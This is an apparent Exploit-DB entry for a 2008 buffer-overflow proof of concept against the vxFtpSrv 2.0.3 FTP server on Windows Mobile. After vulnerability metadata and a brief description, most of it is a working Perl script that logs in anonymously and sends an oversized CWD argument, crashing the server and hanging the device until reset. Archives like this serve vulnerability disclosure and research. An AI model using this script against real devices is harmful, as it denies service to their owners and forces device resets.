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vendor:
vxFtpSrv
by:
Julien Bedard
7.5
CVSS
HIGH
Buffer Overflow
120 (Buffer Copy without Checking Size of Input)
CWE
Product Name: vxFtpSrv
Affected Version From: 2.0.3
Affected Version To: 2.0.3
Patch Exists: NO
Related CWE: N/A
CPE: a:vxftpsrv:vxftpsrv:2.0.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: MS Windows Mobile 6.0
2008

vxFtpSrv 2.0.3 CWD command Overflow PoC

vxftpsrv is the most common ftp server for mobile devices: wm, ppc etc. It suffer of an overflow when it recieve too long data string by the CWD command. The result will be immediately close server and the windows mobile device will really hang-up. So it's required to reset the device to be completely operational. Maybe we can exploit this issue for doing command execution but it has not been tested.

Mitigation:

N/A
Source

Exploit-DB raw data:

#!/usr/bin/perl
########################################################
#
#  vxFtpSrv 2.0.3 CWD command Overflow PoC
#  by Julien Bedard (www.kosseclab.com)
#  info@kosseclab.com
#
#  Tested on MS Windows Mobile 6.0
#  (maybe other versions are vulnerable)
#
# vxftpsrv is the most common ftp
# server for mobile devices: wm, ppc etc.
# it suffer of an overflow when it recieve too long
# data string by the CWD command.
#
# the result will be immediately close server and
# the windows mobile device will really hang-up.
# so it's required to reset the device to be completely
# operational.
#
# Maybe we can exploit this issue for doing command
# execution but i've not test it since i have nothing
# to debug the application in real time.
#
# If you can help for further analysis please email me
# at info@kosseclab.com
#
########################################################

use Net::FTP;
$wftpsrvaddr = "255.255.255.255";
$overflow = "A" x 330;
$user = "anonymous";
$pass = "test@something.com";
$port = 21;

$ftp = Net::FTP->new("$wftpsrvaddr", Debug => 0) || die "Cannot connect to ftp server: $@";
$ftp->login($user,$pass) || die "Cannot login ", $ftp->message;

$ftp->cwd($overflow);
$ftp->quit;

# milw0rm.com [2008-10-02]